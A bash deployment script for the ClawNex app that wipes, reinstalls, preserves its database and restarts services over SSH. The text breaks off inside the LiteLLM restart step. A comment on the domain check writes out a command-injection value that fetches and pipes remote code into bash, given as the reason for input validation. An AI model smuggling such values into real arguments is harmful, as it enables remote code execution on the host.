#!/bin/bash
# =============================================================================
# ClawNex — Production Deploy Script (clean wipe + fresh install + health)
#
# Drops into a remote Linux host over SSH, runs the canonical wipe + install
# pipeline (matches deploy/install-prod.sh's expectations), and prints a
# health summary + setup URL on success. Successor to /tmp/cru_qa_deploy.sh —
# durable, parameterized, OpenClaw-preserving.
#
# Usage:
#   bash scripts/deploy-prod.sh \
#     --host  operator@host.example \
#     --domain <deployment-domain> \
#     [--version 0.10.0-alpha]   # default: read from package.json
#     [--sudo-pass-stdin]       # read sudo pw from stdin (recommended)
#     [--sudo-pass-env VAR]     # OR read from a named env var
#     [--dry-run]               # print plan, don't execute
#     [--no-deep-clean]         # skip cleanup of clawkeeper / unit / cron / Caddyfile
#     [--preserve-data]         # tar clawnex.db* before wipe, restore after install
#                               # (default: ON when --domain matches
#                               #  $CLAWNEX_QA_DOMAIN, OFF otherwise)
#     [--no-preserve-data]      # force-disable preservation even on QA hosts
#     [--help]
#
# Exit codes:
#   0  success
#   1  pre-flight failure (missing tarball, bad args, etc.)
#   2  user aborted at confirmation prompt
#   3  remote wipe/install failure
#   4  post-deploy health check failed
#
# Scope:
#   What this script REMOVES on the remote (ClawNex artifacts only, per
#   feedback_clawnex_cleanup_scope.md "If ClawNex installed it then remove it"):
#     - $HOME/clawnex/                              (install dir)
#     - $HOME/.local/bin/clawkeeper.sh              (curl|bash from setup.sh)
#     - /etc/systemd/system/clawnex-dashboard.service{,.d/*}
#     - /etc/systemd/system/clawnex-litellm.service{,.d/*}
#     - /etc/caddy/Caddyfile                        (regenerated by install-prod.sh)
#     - crontab `# clawnex-watchdog` line
#     - /tmp/cnx-bundle.tar.gz, /tmp/clawnex-stage  (deploy leftovers)
#
#   What this script NEVER touches (per feedback_never_touch_openclaw.md):
#     - $HOME/.openclaw/                            (entire tree, including
#                                                    operator state, keys,
#                                                    paired devices, agents)
#     - $HOME/.config/systemd/user/openclaw-gateway.service
#     - The `openclaw` binary at $HOME/.npm-global/bin/openclaw
#     - LiteLLM Python install (process killed via port 4001, package preserved)
#
#   Optional data preservation (--preserve-data, default ON when --domain matches $CLAWNEX_QA_DOMAIN):
#     Tar clawnex.db + clawnex.db-wal + clawnex.db-shm to /tmp before the wipe;
#     restore them after install but before the dashboard service restart.
#     Operator accounts, sessions, configs, accepted-risk records, and the
#     wizard-dismissed flag survive the redeploy. .env.local still rotates
#     (new SETUP_SECRET / INGEST_SECRET each deploy) — preservation is scoped
#     to the SQLite DB only.
#
# OpenClaw preservation is enforced explicitly: after the wipe, the script
# verifies $HOME/.openclaw/openclaw.json still exists. If not, it aborts the
# install phase rather than papering over a regression.
# =============================================================================

set -euo pipefail

# ---------------------------------------------------------------------------
# Defaults + CLI parsing
# ---------------------------------------------------------------------------

REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"

HOST=""
DOMAIN=""
VERSION=""
CLAWNEX_QA_DOMAIN="${CLAWNEX_QA_DOMAIN:-}"
SUDO_PASS_MODE="prompt"        # prompt | stdin | env
SUDO_PASS_ENV_VAR=""
DRY_RUN=0
DEEP_CLEAN=1
# PRESERVE_DATA: -1 = unset (decide from domain), 0 = forced off, 1 = forced on
PRESERVE_DATA=-1

print_help() {
  # Extract Usage block; portable across BSD/GNU head — drop trailing
  # "Exit codes:" line via awk, no GNU-only `head -n -1`.
  sed -n '/^# Usage:/,/^# Exit codes:/p' "$0" \
    | sed 's/^# \{0,1\}//' \
    | awk '/^Exit codes:$/ {exit} {print}'
}

while [ $# -gt 0 ]; do
  case "$1" in
    --host)             HOST="$2"; shift 2 ;;
    --domain)           DOMAIN="$2"; shift 2 ;;
    --version)          VERSION="$2"; shift 2 ;;
    --sudo-pass-stdin)  SUDO_PASS_MODE="stdin"; shift ;;
    --sudo-pass-env)    SUDO_PASS_MODE="env"; SUDO_PASS_ENV_VAR="$2"; shift 2 ;;
    --dry-run)          DRY_RUN=1; shift ;;
    --no-deep-clean)    DEEP_CLEAN=0; shift ;;
    --preserve-data)    PRESERVE_DATA=1; shift ;;
    --no-preserve-data) PRESERVE_DATA=0; shift ;;
    -h|--help)          print_help; exit 0 ;;
    *)                  echo "unknown arg: $1" >&2; print_help >&2; exit 1 ;;
  esac
done

# ---------------------------------------------------------------------------
# Color helpers
# ---------------------------------------------------------------------------

if [ -t 1 ]; then
  C_RED=$'\033[0;31m'; C_GREEN=$'\033[0;32m'; C_YEL=$'\033[1;33m'
  C_CYAN=$'\033[0;36m'; C_DIM=$'\033[2m'; C_BOLD=$'\033[1m'; C_NC=$'\033[0m'
else
  C_RED=""; C_GREEN=""; C_YEL=""; C_CYAN=""; C_DIM=""; C_BOLD=""; C_NC=""
fi

die() { echo -e "${C_RED}✗${C_NC} $*" >&2; exit "${2:-1}"; }
info() { echo -e "${C_CYAN}→${C_NC} $*"; }
ok()   { echo -e "${C_GREEN}✓${C_NC} $*"; }
warn() { echo -e "${C_YEL}!${C_NC} $*"; }

# ---------------------------------------------------------------------------
# Required-arg validation
# ---------------------------------------------------------------------------

[ -n "$HOST" ]   || die "missing --host (e.g., operator@host.example)"
[ -n "$DOMAIN" ] || die "missing --domain (e.g., app.example.com)"

# Closes CX-R14-01 (SSH command injection via --domain). The line at the
# bottom of this script ships DOMAIN inside a single-quoted shell fragment
# that the local shell expands. A value like `evil.com' ; curl pwn | bash ; #`
# would break out of the quoting and execute on the remote. install-prod.sh
# already validates the domain with this exact regex; mirror it here so the
# two install paths share the same input policy.
if ! [[ "$DOMAIN" =~ ^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$ ]]; then
  die "invalid --domain: $DOMAIN (must be letters/digits/dots/hyphens; cannot start or end with hyphen/dot)"
fi

# Resolve PRESERVE_DATA default: ON only when the target matches an operator-supplied
# QA domain. operator flagged 2026-05-07: clean wipe on every redeploy was nuking
# the operator DB, forcing re-onboarding each time. Internal QA hosts need
# persistent state; demo host/test host/etc. can be explicit when they want it.
if [ "$PRESERVE_DATA" = "-1" ]; then
  if [ -n "$CLAWNEX_QA_DOMAIN" ] && [ "$DOMAIN" = "$CLAWNEX_QA_DOMAIN" ]; then
    PRESERVE_DATA=1
  else
    PRESERVE_DATA=0
  fi
fi

# Resolve VERSION from package.json if not given (same regex package.sh uses
# so the source of truth stays single-file)
if [ -z "$VERSION" ]; then
  VERSION=$(grep -E '^\s*"version"' "$REPO_ROOT/package.json" \
              | head -1 \
              | sed -E 's/.*"version"[[:space:]]*:[[:space:]]*"([^"]+)".*/\1/')
  [ -n "$VERSION" ] || die "could not parse version from $REPO_ROOT/package.json"
fi

LOCAL_TARBALL="$REPO_ROOT/deploy/clawnex-v${VERSION}-deploy.tar.gz"
[ -f "$LOCAL_TARBALL" ] || die "tarball not found: $LOCAL_TARBALL
       Run \`bash deploy/package.sh\` first."

TARBALL_SIZE=$(du -h "$LOCAL_TARBALL" 2>/dev/null | awk '{print $1}')
COMMIT_SHA=$(cd "$REPO_ROOT" && git rev-parse --short HEAD 2>/dev/null || echo "n/a")
BRANCH=$(cd "$REPO_ROOT" && git rev-parse --abbrev-ref HEAD 2>/dev/null || echo "n/a")

# ---------------------------------------------------------------------------
# Sudo password resolution (NEVER echoed, NEVER in argv)
# ---------------------------------------------------------------------------

resolve_sudo_pass() {
  case "$SUDO_PASS_MODE" in
    stdin)
      if [ -t 0 ]; then
        die "--sudo-pass-stdin given but stdin is a tty. Pipe the password in:
       printf '%s\\n' \"\$PW\" | bash scripts/deploy-prod.sh ... --sudo-pass-stdin"
      fi
      IFS= read -r SUDO_PASS || die "failed to read password from stdin"
      ;;
    env)
      [ -n "$SUDO_PASS_ENV_VAR" ] || die "--sudo-pass-env requires a variable name"
      SUDO_PASS="${!SUDO_PASS_ENV_VAR:-}"
      [ -n "$SUDO_PASS" ] || die "env var \$$SUDO_PASS_ENV_VAR is empty"
      ;;
    prompt)
      printf "Sudo password for %s: " "$HOST" >&2
      IFS= read -rs SUDO_PASS
      echo >&2
      [ -n "$SUDO_PASS" ] || die "empty password"
      ;;
  esac
}

# ---------------------------------------------------------------------------
# Pre-flight summary
# ---------------------------------------------------------------------------

cat <<BANNER

${C_BOLD}═════════════════════════════════════════════════════════════════════════
  ClawNex deploy preflight
═════════════════════════════════════════════════════════════════════════${C_NC}

  ${C_DIM}Local${C_NC}
    Repo branch       ${BRANCH} @ ${COMMIT_SHA}
    Tarball version   ${VERSION}
    Tarball path      ${LOCAL_TARBALL}
    Tarball size      ${TARBALL_SIZE}

  ${C_DIM}Target${C_NC}
    Host              ${HOST}
    Domain            ${DOMAIN}
    Sudo source       ${SUDO_PASS_MODE}${SUDO_PASS_ENV_VAR:+ (\$$SUDO_PASS_ENV_VAR)}

  ${C_DIM}Wipe scope${C_NC} $([ "$DEEP_CLEAN" = "1" ] && echo "(deep)" || echo "(shallow — install dir only)")
    ✓ stop systemd services (clawnex-dashboard, clawnex-litellm)
    ✓ kill ports 5001, 4001 (TERM → KILL fallback)$(if [ "$PRESERVE_DATA" = "1" ]; then echo "
    ✓ tar clawnex.db* → /tmp/clawnex-data-preserve.tar.gz BEFORE wipe"; fi)
    ✓ rm -rf \$HOME/clawnex$(if [ "$PRESERVE_DATA" = "1" ]; then echo "
    ✓ restore clawnex.db* AFTER install, before systemd restart"; fi)
    ✓ sweep /tmp/cnx-bundle.tar.gz, /tmp/clawnex-stage
$(if [ "$DEEP_CLEAN" = "1" ]; then cat <<EXTRA
    ✓ rm -f \$HOME/.local/bin/clawkeeper.sh
    ✓ rm -f /etc/systemd/system/clawnex-{dashboard,litellm}.service{,.d/*}
    ✓ rm -f /etc/caddy/Caddyfile (regenerated by install-prod.sh)
    ✓ remove crontab \`# clawnex-watchdog\` line
EXTRA
fi)

  ${C_DIM}Untouched (per feedback_never_touch_openclaw.md)${C_NC}
    × \$HOME/.openclaw/   (full tree)
    × \$HOME/.config/systemd/user/openclaw-gateway.service
    × \$HOME/.npm-global/bin/openclaw
    × LiteLLM package     (process killed; pip package preserved)

  ${C_DIM}Data preservation${C_NC} $([ "$PRESERVE_DATA" = "1" ] && echo "ON  (operator DB survives the redeploy)" || echo "OFF (clean install — re-onboarding required)")

BANNER

if [ "$DRY_RUN" = "1" ]; then
  warn "--dry-run: exiting without executing"
  exit 0
fi

# Confirmation prompt — only if stdin is a tty AND we're not in stdin-pass
# mode (which already consumed stdin). Otherwise auto-proceed.
if [ -t 0 ] && [ "$SUDO_PASS_MODE" != "stdin" ]; then
  read -r -p "Proceed? [y/N] " ANSWER
  case "${ANSWER:-N}" in
    y|Y|yes|YES) ;;
    *) die "aborted" 2 ;;
  esac
fi

resolve_sudo_pass

# ---------------------------------------------------------------------------
# Stage 1: copy tarball to remote
# ---------------------------------------------------------------------------

info "copying tarball to ${HOST}:/tmp/cnx-bundle.tar.gz"
scp -q -o BatchMode=yes "$LOCAL_TARBALL" "$HOST:/tmp/cnx-bundle.tar.gz" \
  || die "scp failed" 3
ok "tarball uploaded"

# ---------------------------------------------------------------------------
# Stage 2: remote wipe + install + health
# ---------------------------------------------------------------------------

info "running remote deploy (wipe + install + health)"

# Build the remote script. Variable expansion: only the named ones below
# (DOMAIN, SUDOPW_B64, DEEP_CLEAN_REMOTE, PRESERVE_DATA_REMOTE) leak in.
# Everything else inside the heredoc runs on the remote.
#
# CX-R14-01 hardening: DOMAIN is regex-validated above (no quotes/metacharacters
# possible). DEEP_CLEAN_REMOTE / PRESERVE_DATA_REMOTE are integer 0/1 set by the
# option parser. SUDO_PASS is the dangerous one — passwords routinely contain
# `'`, `;`, `$`, `"`, etc. so naive single-quoting in the SSH command string
# is exploitable. Base64-encode it before interpolation: base64 output is
# limited to [A-Za-z0-9+/=] (all shell-safe) and the remote decodes it back
# into SUDOPW before the existing ASKPASS-file flow takes over.
DEEP_CLEAN_REMOTE="$DEEP_CLEAN"
PRESERVE_DATA_REMOTE="$PRESERVE_DATA"
SUDO_PASS_B64=$(printf '%s' "$SUDO_PASS" | base64 | tr -d '\n')
ssh -o BatchMode=yes "$HOST" \
  "DOMAIN='$DOMAIN' SUDOPW_B64='$SUDO_PASS_B64' DEEP_CLEAN='$DEEP_CLEAN_REMOTE' PRESERVE_DATA='$PRESERVE_DATA_REMOTE' bash -s" <<'REMOTE_SCRIPT'
set -uo pipefail
INSTALL_DIR="$HOME/clawnex"
TARBALL="/tmp/cnx-bundle.tar.gz"
DATA_PRESERVE_TAR="/tmp/clawnex-data-preserve.tar.gz"

# Decode the password back from the base64 envelope. Failure here means an
# upstream copy/paste of SUDO_PASS_B64 went wrong; we'd rather fail loudly
# than silently auth as the wrong account.
SUDOPW=$(printf '%s' "$SUDOPW_B64" | base64 -d 2>/dev/null) || {
  echo "  decode of SUDOPW_B64 failed — refusing to continue"
  exit 1
}
unset SUDOPW_B64

# --- ASKPASS shim: never put the password on a process argv -----------------
# Robust against passwords with shell metacharacters: write the literal
# password bytes to a separate file via printf (no heredoc shell expansion),
# then have the askpass cat that file. The askpass file itself contains no
# password bytes, only a path reference.
ASKPASS=$(mktemp /tmp/.askpass-XXXXXX)
PASSFILE=$(mktemp /tmp/.passfile-XXXXXX)
chmod 600 "$PASSFILE"
chmod 700 "$ASKPASS"
printf '%s' "$SUDOPW" > "$PASSFILE"
cat > "$ASKPASS" <<ASKPASS_EOF
#!/bin/bash
cat "$PASSFILE"
ASKPASS_EOF
export SUDO_ASKPASS="$ASKPASS"
trap 'rm -f "$ASKPASS" "$PASSFILE"' EXIT

if ! sudo -A -v 2>/tmp/.sudo-prime.err; then
  echo "  sudo prime FAILED"
  echo "  --- sudo stderr ---"
  cat /tmp/.sudo-prime.err 2>/dev/null || true
  echo "  --- askpass perms ---"
  ls -la "$ASKPASS" "$PASSFILE" 2>/dev/null || true
  echo "  --- askpass output ---"
  bash "$ASKPASS" | wc -c | awk '{print "  password length: "$1" bytes"}'
  exit 1
fi
echo "  sudo primed"

# --- 1/8 stop services + kill ports -----------------------------------------
echo "=== 1/8 stop + port-kill ==="
sudo -A systemctl stop clawnex-dashboard.service clawnex-litellm.service 2>/dev/null || true
for port in 5001 4001; do
  for attempt in 1 2 3; do
    pid=$(lsof -ti :"$port" 2>/dev/null | head -1)
    [ -z "$pid" ] && break
    kill -TERM "$pid" 2>/dev/null; sleep 1
    kill -0 "$pid" 2>/dev/null && kill -KILL "$pid" 2>/dev/null && sleep 1
  done
done
echo "  stopped"

# --- 2/8 wipe install dir (preserve operator DB if requested) ---------------
echo "=== 2/8 wipe \$HOME/clawnex ==="
# Preserve operator state (clawnex.db + WAL + SHM) BEFORE the wipe so a clean
# redeploy doesn't force re-onboarding. operator-flagged 2026-05-07: QA was
# burning operator accounts on every deploy.
if [ "${PRESERVE_DATA:-0}" = "1" ]; then
  rm -f "$DATA_PRESERVE_TAR" 2>/dev/null || true
  if [ -f "$INSTALL_DIR/clawnex.db" ]; then
    # Tar with -C so paths in the archive are relative to INSTALL_DIR.
    # --ignore-failed-read so a missing -wal / -shm doesn't fail the tar
    # (those only exist when the DB has been written to recently).
    if tar --no-xattrs -czf "$DATA_PRESERVE_TAR" -C "$INSTALL_DIR" \
         --ignore-failed-read \
         clawnex.db clawnex.db-wal clawnex.db-shm 2>/dev/null; then
      # Reviewer 2026-05-07: --ignore-failed-read silently swallows a read
      # error on clawnex.db itself (not just the optional -wal/-shm), so a
      # zero-exit tar can still produce an empty archive that restores into
      # an empty DB on next deploy. Fail closed: verify the archive is
      # non-empty AND contains the main DB file before continuing the wipe.
      if [ ! -s "$DATA_PRESERVE_TAR" ]; then
        echo "  ✗ preserve tar succeeded but archive is empty — likely a read"
        echo "    error on clawnex.db. Aborting before wipe to prevent silent"
        echo "    data loss. Investigate file permissions / disk health."
        exit 1
      fi
      # Capture the tar listing into a variable, NOT a pipe. Reason:
      # `set -o pipefail` + `grep -q` short-circuits as soon as it matches,
      # which makes tar receive SIGPIPE late in its output stream and exit
      # non-zero. Pipefail then propagates that non-zero through the pipe,
      # making the `if !` branch fire even when grep matched. (Diagnosed
      # 2026-05-07 after a false-positive abort on staging host.)
      TAR_LISTING=$(tar -tzf "$DATA_PRESERVE_TAR" 2>/dev/null || true)
      ENTRY_COUNT=$(printf '%s\n' "$TAR_LISTING" | grep -c . || true)
      if [ "${ENTRY_COUNT:-0}" -lt 1 ]; then
        echo "  ✗ preserve tar is unreadable or lists 0 entries."
        echo "    Aborting before wipe to prevent silent data loss."
        exit 1
      fi
      # EXACT-MATCH for "clawnex.db" on its own line — not a substring.
      # Stress test 2026-05-07 caught the substring-match bug: when
      # clawnex.db is unreadable (chmod 000) but -wal / -shm aren't,
      # --ignore-failed-read silently archives only the WAL files. The
      # listing has 2 entries (clawnex.db-wal, clawnex.db-shm) which both
      # CONTAIN the substring "clawnex.db" — the prior glob match
      # passed, deploy continued, restore put back only WAL files,
      # dashboard booted empty, operator data lost.
      #
      # Fix: read the listing line-by-line and require an EXACT
      # "clawnex.db" line. WAL/SHM files alone are NOT proof the main DB
      # was captured.
      HAS_MAIN_DB=0
      while IFS= read -r tar_line; do
        if [ "$tar_line" = "clawnex.db" ]; then
          HAS_MAIN_DB=1
          break
        fi
      done <<< "$TAR_LISTING"
      if [ "$HAS_MAIN_DB" -ne 1 ]; then
        echo "  ✗ preserve tar contains $ENTRY_COUNT entries but no exact"
        echo "    'clawnex.db' entry — likely a read error on the main DB"
        echo "    that --ignore-failed-read swallowed. WAL/SHM files alone"
        echo "    are not enough to restore operator state."
        echo "    Aborting before wipe to prevent silent data loss."
        echo "    Investigate file permissions / disk health."
        exit 1
      fi
      echo "  preserved clawnex.db* → $DATA_PRESERVE_TAR ($(wc -c < "$DATA_PRESERVE_TAR") bytes, $ENTRY_COUNT entries, main DB confirmed)"
    else
      echo "  ✗ preserve tar failed and --preserve-data was requested."
      echo "    Refusing to wipe — re-run with --no-preserve-data if you"
      echo "    intentionally want a clean install."
      exit 1
    fi
  else
    echo "  no clawnex.db to preserve (first deploy on this host)"
  fi
fi
rm -rf "$INSTALL_DIR"
mkdir -p "$INSTALL_DIR"
echo "  wiped"

# --- 3/8 deep clean (optional) ----------------------------------------------
if [ "${DEEP_CLEAN:-1}" = "1" ]; then
  echo "=== 3/8 deep clean (clawkeeper, system units, Caddyfile, watchdog cron) ==="
  rm -f "$HOME/.local/bin/clawkeeper.sh" 2>/dev/null && echo "  removed clawkeeper.sh" || true
  sudo -A rm -f /etc/systemd/system/clawnex-dashboard.service 2>/dev/null && echo "  removed clawnex-dashboard.service" || true
  sudo -A rm -rf /etc/systemd/system/clawnex-dashboard.service.d 2>/dev/null && echo "  removed clawnex-dashboard.service.d/" || true
  sudo -A rm -f /etc/systemd/system/clawnex-litellm.service 2>/dev/null && echo "  removed clawnex-litellm.service" || true
  sudo -A rm -rf /etc/systemd/system/clawnex-litellm.service.d 2>/dev/null && echo "  removed clawnex-litellm.service.d/" || true
  sudo -A systemctl daemon-reload 2>/dev/null || true
  sudo -A rm -f /etc/caddy/Caddyfile 2>/dev/null && echo "  removed /etc/caddy/Caddyfile (install-prod.sh will regenerate)" || true
  # Watchdog cron — match the exact "# clawnex-watchdog" marker setup.sh
  # stamps so unrelated *watchdog cron entries don't get nuked too.
  if crontab -l 2>/dev/null | grep -q "# clawnex-watchdog"; then
    crontab -l 2>/dev/null | grep -v "# clawnex-watchdog" | crontab -
    echo "  removed clawnex-watchdog cron line"
  fi
else
  echo "=== 3/8 deep clean SKIPPED (--no-deep-clean) ==="
fi

# --- 4/8 OpenClaw preservation guard ----------------------------------------
echo "=== 4/8 OpenClaw preservation guard ==="
if [ ! -f "$HOME/.openclaw/openclaw.json" ]; then
  echo "  ✗ \$HOME/.openclaw/openclaw.json MISSING after wipe — refusing to install."
  echo "    This indicates the wipe over-extended scope. Investigate before retrying."
  exit 1
fi
echo "  ✓ \$HOME/.openclaw/openclaw.json intact ($(wc -c < $HOME/.openclaw/openclaw.json) bytes)"

# --- 5/8 extract tarball into install dir -----------------------------------
echo "=== 5/8 extract tarball ==="
rm -rf /tmp/clawnex-stage
mkdir -p /tmp/clawnex-stage
tar --no-xattrs -xzf "$TARBALL" -C /tmp/clawnex-stage 2>/dev/null
EXTRACTED=$(ls -d /tmp/clawnex-stage/*/ 2>/dev/null | head -1)
shopt -s dotglob
mv "$EXTRACTED"* "$INSTALL_DIR"/
shopt -u dotglob
rm -rf /tmp/clawnex-stage
[ -f "$INSTALL_DIR/setup.sh" ] || { echo "  ✗ extract failed (no setup.sh)"; exit 1; }
echo "  extracted"

# --- 6/8 .env.local ---------------------------------------------------------
echo "=== 6/8 .env.local ==="
cd "$INSTALL_DIR"
SETUP_SECRET=$(openssl rand -hex 32)
INGEST_SECRET=$(openssl rand -hex 32)
# Parity with setup.sh's .env.local generator. DAST-2 #4 (6f0789b)
# added SESSION_SECRET to setup.sh, but this parallel writer was
# missed — fresh deploys via deploy-prod.sh ended up without
# SESSION_SECRET, forcing csrf-hmac.ts onto the SETUP_SECRET-derived
# fallback path. LITELLM_MASTER_KEY was also never written here
# (setup.sh:889 writes it). Both now generated fresh on every deploy.
SESSION_SECRET=$(openssl rand -hex 32)
LITELLM_MASTER_KEY="sk-$(openssl rand -hex 24)"
cat > .env.local <<EOF
RBAC_ENABLED=true
NEXT_PUBLIC_RBAC_ENABLED=true
SETUP_SECRET=${SETUP_SECRET}
SESSION_SECRET=${SESSION_SECRET}
CLAWNEX_INGEST_SECRET=${INGEST_SECRET}
LITELLM_MASTER_KEY=${LITELLM_MASTER_KEY}
AUTH_RP_ID=${DOMAIN}
AUTH_RP_NAME=ClawNex
AUTH_EXPECTED_ORIGIN=https://${DOMAIN}
LITELLM_HOST=127.0.0.1
LITELLM_PORT=4001
PORT=5001
HOSTNAME=127.0.0.1
NODE_ENV=production
EOF
chmod 600 .env.local
echo "  .env.local written"

# --- 7/8 npm ci + build + install-prod.sh + chown + symlinks + restart -----
echo "=== 7/8 npm ci + build ==="
DEPLOY_LOG_DIR="/tmp/clawnex-deploy-logs-$(date +%Y%m%d-%H%M%S)"
mkdir -p "$DEPLOY_LOG_DIR"
echo "  full deploy logs: $DEPLOY_LOG_DIR"
npm ci --no-audit --no-fund 2>&1 | tee "$DEPLOY_LOG_DIR/npm-ci.log" | tail -40
npm run build 2>&1 | tee "$DEPLOY_LOG_DIR/npm-build.log" | tail -80

echo "=== 7/8 install-prod.sh ${DOMAIN} ==="
{ printf '%s\nyes\n' "$SUDOPW"; } | sudo -S -p '' bash deploy/install-prod.sh "$DOMAIN" 2>&1 | tee "$DEPLOY_LOG_DIR/install-prod.log" | tail -80

echo "=== 7/8 chown + symlink data into standalone ==="
sudo -A chown -R $USER:$USER "$INSTALL_DIR"
mkdir -p "$INSTALL_DIR/logs"
# Restore preserved operator DB (if any) BEFORE the symlinks so the
# .next/standalone links point at the restored files, not freshly-empty ones.
# The dashboard hasn't been restarted yet — it'll see the restored DB on first
# boot of this version. Schema migrations (if any) run on startup.
if [ "${PRESERVE_DATA:-0}" = "1" ] && [ -f "$DATA_PRESERVE_TAR" ]; then
  # 2026-05-07 fail-closed restore phase: by this point the wipe has run,
  # so we can't undo a bad restore. But we CAN refuse to start the service
  # against an empty DB — that's the silent-data-loss tail of the fail-
  # closed story (the prose-only claim missed it; this loop closes it).
  RESTORE_FAILED=0
  if ! tar --no-xattrs -xzf "$DATA_PRESERVE_TAR" -C "$INSTALL_DIR" 2>/dev/null; then
    echo "  ✗ tar -xzf failed on $DATA_PRESERVE_TAR"
    RESTORE_FAILED=1
  elif [ ! -f "$INSTALL_DIR/clawnex.db" ]; then
    # Tar exited 0 but the main DB isn't on disk — corrupt archive,
    # path-stripped tar, etc. Fail closed: don't start the dashboard
    # against a freshly-empty DB.
    echo "  ✗ tar extraction succeeded but $INSTALL_DIR/clawnex.db is missing"
    RESTORE_FAILED=1
  fi
  if [ "$RESTORE_FAILED" = "1" ]; then
    echo "  ✗ DB restore failed and --preserve-data was requested. Refusing"
    echo "    to start the dashboard against an empty DB. Preserve archive"
    echo "    LEFT IN PLACE at $DATA_PRESERVE_TAR for manual recovery:"
    echo "      tar -xzf $DATA_PRESERVE_TAR -C $INSTALL_DIR"
    echo "      sudo chown -R $USER:$USER $INSTALL_DIR/clawnex.db*"
    echo "      sudo systemctl restart clawnex-dashboard"
    exit 1
  fi
  echo "  ✓ restored operator DB from $DATA_PRESERVE_TAR"
  # Re-run chown so the restored files match the install-dir owner.
  sudo -A chown $USER:$USER \
    "$INSTALL_DIR/clawnex.db" \
    "$INSTALL_DIR/clawnex.db-wal" \
    "$INSTALL_DIR/clawnex.db-shm" 2>/dev/null || true
  # DAST 2026-05-15 H2 (Run 2): tighten restored DB triple to 600 at
  # the shell level. The runtime DB-open path also chmod's, but the
  # tarball-restored permissions get preserved literally (tar -p), and
  # if the source archive was taken from a 644-era install the perms
  # would survive the restore. Belt-and-suspenders alongside the
  # umask=077 + chmod in src/lib/db/index.ts.
  chmod 600 \
    "$INSTALL_DIR/clawnex.db" \
    "$INSTALL_DIR/clawnex.db-wal" \
    "$INSTALL_DIR/clawnex.db-shm" 2>/dev/null || true
  # Only delete the preserve archive on a verified-successful restore.
  # On any failure path above we exited; the archive is preserved.
  rm -f "$DATA_PRESERVE_TAR" 2>/dev/null || true
fi

# ---------------------------------------------------------------------------
# Post-deploy rehydration of LiteLLM config.yaml from the restored DB.
# internal reviewer 2026-05-10 ordering fix: rehydrate is owned by the deploy wrapper,
# NOT install-prod.sh. install-prod.sh runs BEFORE this REMOTE_SCRIPT
# restores the preserved DB, so a rehydrate hook there would always see
# an empty DB. Correct placement: AFTER restore + chown, BEFORE standalone
# symlinks and dashboard/litellm restart.
#
# Resolves DB path the same way the dashboard does (DATABASE_PATH from
# .env.local, with fallback to $INSTALL_DIR/clawnex.db, with relative
# resolution against $INSTALL_DIR). Uses pinned local tsx (./node_modules/
# .bin/tsx) — never bare npx. Fail-closed: any failure exits 1.
# ---------------------------------------------------------------------------
RESOLVED_DB_PATH=""
if [ -f "${INSTALL_DIR}/.env.local" ]; then
    RESOLVED_DB_PATH=$(grep -E "^DATABASE_PATH=" "${INSTALL_DIR}/.env.local" | head -1 | cut -d= -f2- | tr -d '"' | tr -d "'")
fi
if [ -z "$RESOLVED_DB_PATH" ]; then
    RESOLVED_DB_PATH="${INSTALL_DIR}/clawnex.db"
elif [ "${RESOLVED_DB_PATH#/}" = "$RESOLVED_DB_PATH" ]; then
    RESOLVED_DB_PATH="${INSTALL_DIR}/${RESOLVED_DB_PATH}"
fi
echo "  DB path for rehydrate: ${RESOLVED_DB_PATH}"

TSX_BIN="${INSTALL_DIR}/node_modules/.bin/tsx"
if [ ! -x "$TSX_BIN" ]; then
    echo "  ✗ pinned tsx binary not found at ${TSX_BIN} — npm ci did not populate node_modules. Aborting."
    exit 1
fi

if [ -f "$RESOLVED_DB_PATH" ]; then
    if [ ! -f "${INSTALL_DIR}/scripts/post-deploy-rehydrate.ts" ]; then
        echo "  ✗ post-deploy rehydrate script missing despite DB existing. Aborting."
        exit 1
    fi
    echo "  Rehydrating LiteLLM config from DB providers..."
    REHYDRATE_OUT=$(cd "$INSTALL_DIR" && "$TSX_BIN" scripts/post-deploy-rehydrate.ts \
        --install-dir "$INSTALL_DIR" \
        --database   "$RESOLVED_DB_PATH" \
        --config     "$INSTALL_DIR/litellm/config.yaml" 2>&1) || {
        echo "  ✗ post-deploy rehydrate failed (deploy is not launch-grade with broken sync):"
        echo "$REHYDRATE_OUT" | head -20
        exit 1
    }
    echo "$REHYDRATE_OUT" | head -20
else
    echo "  post-deploy rehydrate skipped (no DB at ${RESOLVED_DB_PATH})"
fi

STANDALONE_DIR="$INSTALL_DIR/.next/standalone"
if [ ! -f "$STANDALONE_DIR/server.js" ]; then
  echo "  ✗ Next standalone runtime missing: $STANDALONE_DIR/server.js"
  echo "    Refusing to create DB/config symlinks or restart dashboard."
  echo "    Check $DEPLOY_LOG_DIR/npm-build.log and $DEPLOY_LOG_DIR/install-prod.log."
  exit 1
fi
if [ ! -d "$STANDALONE_DIR/.next/static" ]; then
  echo "  ✗ Next standalone static assets missing: $STANDALONE_DIR/.next/static"
  echo "    Refusing to create DB/config symlinks or restart dashboard."
  echo "    Check $DEPLOY_LOG_DIR/npm-build.log and $DEPLOY_LOG_DIR/install-prod.log."
  exit 1
fi

ln -sf ../../clawnex.db     "$STANDALONE_DIR/clawnex.db"
ln -sf ../../clawnex.db-wal "$STANDALONE_DIR/clawnex.db-wal"
ln -sf ../../clawnex.db-shm "$STANDALONE_DIR/clawnex.db-shm"
rm -rf "$STANDALONE_DIR/logs"
ln -sf ../../logs           "$STANDALONE_DIR/logs"
# 2026-05-09 operator-flagged: dashboard's process.cwd() in standalone mode
# resolves to .next/standalone/, so syncProvidersToYaml(path.join(cwd,
# 'litellm', 'config.yaml')) writes to .next/standalone/litellm/config.yaml.
# But the systemd LiteLLM unit reads from $INSTALL_DIR/litellm/config.yaml.
# Symlink the standalone litellm dir to the parent's so both paths resolve
# to the same file. Same pattern as clawnex.db / logs above.
rm -rf "$STANDALONE_DIR/litellm"
ln -sf ../../litellm        "$STANDALONE_DIR/litellm"

# Restart LiteLLM first so it consumes the rehydrated config.yaml. internal reviewer
# 2026-05-10 spec: deploy script uses systemctl and fails closed on
# restart/active-state failure. Manual kill-TERM is fine for ops recovery
# but not for the canonical deploy path.
if sudo -A systemctl is-enabled --quiet clawnex-litellm.service 2>/dev/null; then
    echo "  Restarting clawnex-litellm to consume rehydrated config..."
    if ! sudo -A systemctl restart clawnex-litellm.service; then
        echo "  ✗ clawnex-litellm restart failed — config on disk may not match running proxy."
        sudo -A journalctl -u clawnex-litellm.service -n 30 --no-pager 2>/dev/null || true
        exit 1
    fi
    sleep 3
